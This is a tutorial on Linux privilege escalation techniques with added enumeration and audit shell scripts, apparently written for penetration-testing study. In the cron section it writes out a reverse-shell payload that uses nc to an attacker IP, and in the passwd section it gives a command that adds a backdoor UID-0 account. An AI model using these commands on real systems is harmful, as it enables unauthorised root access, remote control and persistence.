Introduction
What is Privilege Escalation?
Privilege escalation is an attack that turns a low-privileged foothold on a system into privileged (typically root) access. It not only gives us access to every resource on that system but is also closely tied to lateral movement: we can dump other users' credentials saved on the box and try them against other hosts on the same intranet. Below are some common methods of escalating privileges on Linux.
Manual Enumeration (Information Gathering)
- id: show our user, groups and UID/GID
- hostname
- env: check environment variables
- cat .bashrc: check the shell initialization script
- history: check previously executed commands
- cat /etc/passwd: show all users' information
- uname -a: check the kernel version and find out whether this version has known kernel vulnerabilities
- cat /etc/issue: check the system version
- cat /etc/os-release: check the system version
- ps aux: list all processes
- find / -writable -type d 2>/dev/null: find the folders that you are able to modify
- find / -perm -u=s -type f 2>/dev/null: find executable files with the setuid flag
- find / -name "*backup*" -type f 2>/dev/null: find backup files (the glob is quoted so the shell does not expand it before find sees it)
- ls -lah /etc/cron*: traverse scheduled tasks
- ss -anp: display active network connections and listening ports
- lsmod: enumerate the loaded kernel modules
Automated Enumeration (Information Gathering)
- linPEAS
- unix-privesc-check [standard | detailed]
Abusing Cron Jobs
Check which cron jobs exist and have been running (the system crontab files carry a user field, so they show who each job runs as):
cat /etc/crontab
grep "CRON" /var/log/syslog
Find a job that runs with root permission.
Check whether the script that job executes is writable by us (or missing from a directory we can write to).
Start a listener on our machine (nc -lvnp [port]), append the payload to the job's script and wait for the job to fire:
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [local ip] [port] >/tmp/f" >> [target job file].sh
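The "find a root job, then check whether its script is writable" steps above, automated as an added example (this is not code from the original post). It parses a system-style crontab, the format of /etc/crontab and the files in /etc/cron.d, which include a user field, and reports every absolute path on a job's command line that we can modify, or that does not exist yet but sits in a directory we can write to. The sample crontab in the test is constructed.

```sh
#!/bin/sh
# Added example for this post (not the author's code). Parses a
# system-style crontab (/etc/crontab or /etc/cron.d/*, the formats that
# carry a user field) and reports each absolute path in a job's command
# line that the current user can write, or that is missing from a
# directory we can write to. Either lets us control what the job runs.

writable_cron_targets() {
    crontab_file="$1"
    # awk emits "user <rest of command line>" for each job, skipping
    # comments, blank lines and VAR=value environment assignments.
    awk '
        function rest(from,   i, s) { s = ""; for (i = from; i <= NF; i++) s = s " " $i; return s }
        /^[ \t]*(#|$)/ { next }
        $1 ~ /^[A-Za-z_][A-Za-z0-9_]*=/ { next }
        $1 ~ /^@/ && NF >= 3 { print $2 rest(3); next }   # @daily user cmd ...
        NF >= 7 { print $6 rest(7) }                        # m h dom mon dow user cmd ...
    ' "$crontab_file" | while read -r user cmdline; do
        for tok in $cmdline; do
            case "$tok" in
                /*) ;;          # absolute path: worth checking
                *) continue ;;  # flag, relative word or redirection
            esac
            if [ -w "$tok" ]; then
                echo "$user writable $tok"
            elif [ ! -e "$tok" ] && [ -w "$(dirname "$tok")" ]; then
                echo "$user creatable $tok"
            fi
        done
    done
}

# Usage against the real system crontab files:
# writable_cron_targets /etc/crontab
# for f in /etc/cron.d/*; do writable_cron_targets "$f"; done
```

A "writable" hit on a root job is the case the payload above targets; a "creatable" hit means the job references a script that does not exist, so we can simply create it. Per-user crontabs (crontab -l) have no user field and are not handled by this parser.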
Abusing Password Authentication
Check the permissions of /etc/passwd and /etc/shadow: is passwd writable, and is shadow readable (or writable)?
Modern Linux stores crypt-style password hashes, usually SHA-512 (prefix $6$) or yescrypt (prefix $y$). openssl can generate a SHA-512 crypt hash (use -5 for SHA-256):
openssl passwd -6 [password]
If /etc/passwd is writable, append a new account with UID 0 and the hash placed directly in the password field (a hash there takes precedence over the x that points to /etc/shadow):
echo "root2:[password hash]:0:0:root:/root:/bin/bash" >> /etc/passwd
then switch to it with su root2 and the password we chose. This adds a second root-equivalent account rather than changing root's own entry. If /etc/shadow is only readable, copy the hashes out and crack them offline (john or hashcat); if it is writable, root's hash can be replaced there directly.
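The checks in this section as an added example (not code from the original post): one function reports the passwd/shadow permissions that make this attack possible, the other parses a passwd-format file and flags extra UID-0 accounts and entries carrying a hash inline instead of x, which is exactly what the root2 line above leaves behind, so it is useful from the defender's side as well. The passwd file in the test is constructed.

```sh
#!/bin/sh
# Added example for this post (not the author's code).
#  - passwd_shadow_perms: can we write passwd, or read/write shadow?
#  - passwd_backdoors: report UID-0 accounts other than root, and entries
#    whose password field holds a hash instead of "x" (hash in passwd
#    overrides the shadow lookup). Prints the hash prefix ($6$, $y$, ...)
#    so the algorithm is visible at a glance.

passwd_shadow_perms() {
    passwd_file="${1:-/etc/passwd}"
    shadow_file="${2:-/etc/shadow}"
    [ -w "$passwd_file" ] && echo "passwd-writable $passwd_file"
    [ -r "$shadow_file" ] && echo "shadow-readable $shadow_file"
    [ -w "$shadow_file" ] && echo "shadow-writable $shadow_file"
    return 0
}

passwd_backdoors() {
    # passwd fields: name:password:UID:GID:GECOS:home:shell
    awk -F: '
        /^[ \t]*(#|$)/ { next }
        $3 == 0 && $1 != "root" { print "uid0-account " $1 }
        $2 != "x" && $2 != "*" && $2 != "" && $2 !~ /^!/ {
            print "inline-hash " $1 " " substr($2, 1, 3)
        }
    ' "$1"
}

# Usage:
# passwd_shadow_perms
# passwd_backdoors /etc/passwd
```

Locked accounts (password field beginning with !) and the * placeholder used for system accounts are deliberately ignored; anything else that is not x is a hash someone put in passwd on purpose.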
Abusing setuid Binaries and Capabilities
Find programs with the setuid bit (the find -perm -u=s command from the enumeration section above) and binaries that carry file capabilities:
/usr/sbin/getcap -r / 2>/dev/null
Go to GTFOBins (https://gtfobins.github.io/) to find an exploit. The site provides an organized list of UNIX binaries and how they can be misused to elevate our privileges, with separate entries for setuid and capability abuse.
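An added example for this section (not code from the original post): setuid_files lists setuid binaries under a directory, and triage_caps reads getcap -r output on stdin and flags capabilities that are commonly turned into root. Both libcap output formats are handled (older "path = cap+ep" and newer "path cap=ep"). The list of capabilities treated as dangerous is an assumption made for this example, not an authoritative classification, and the getcap output in the test is constructed.

```sh
#!/bin/sh
# Added example for this post (not the author's code).
#  - setuid_files DIR: find files with the setuid bit (-perm -4000 is the
#    same test as -perm -u=s). Pipe through "ls -l" to see the owner; only
#    root-owned ones matter for escalation to root.
#  - triage_caps: read "getcap -r /" output on stdin and print
#    "path capability" for capabilities on an assumed danger list.
#    Handles both formats:
#      old:  /usr/bin/python3 = cap_setuid+ep
#      new:  /usr/bin/python3 cap_setuid=ep

setuid_files() {
    find "${1:-/}" -perm -4000 -type f 2>/dev/null
}

triage_caps() {
    awk '
        BEGIN {
            # Assumed danger list for this example: caps that let a process
            # change identity, bypass DAC checks, ptrace, or load modules.
            n = split("cap_setuid cap_setgid cap_dac_override cap_dac_read_search cap_sys_admin cap_sys_ptrace cap_sys_module cap_chown cap_fowner", d, " ")
            for (i = 1; i <= n; i++) danger[d[i]] = 1
        }
        NF < 2 { next }
        {
            path = $1
            caps = ($2 == "=") ? $3 : $2      # old format has a literal "=" field
            sub(/[=+][a-z]*$/, "", caps)      # strip the +ep / =eip flag suffix
            m = split(caps, list, ",")
            for (i = 1; i <= m; i++) if (list[i] in danger) print path, list[i]
        }
    '
}

# Usage:
# setuid_files /usr
# getcap -r / 2>/dev/null | triage_caps
```

Each flagged "path capability" pair is what to look up on GTFOBins; cap_setuid on an interpreter such as python is the classic case, since the interpreter can call setuid(0) and spawn a shell.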
Abusing Sudo
Run
sudo -l
to check which commands we are allowed to run through sudo (and whether a password is required), then go to GTFOBins to find an exploit for those commands.
By the way
Privilege escalation is very flexible, and the methods introduced here are only the most common ones. In a real engagement you need to do the information gathering carefully and look for human behaviour to exploit (reused passwords, credentials in scripts or history), as well as design flaws or oversights in the operating system or web applications. I recommend reading the output of linPEAS closely; it often highlights exactly the misconfiguration you can use to escalate privileges.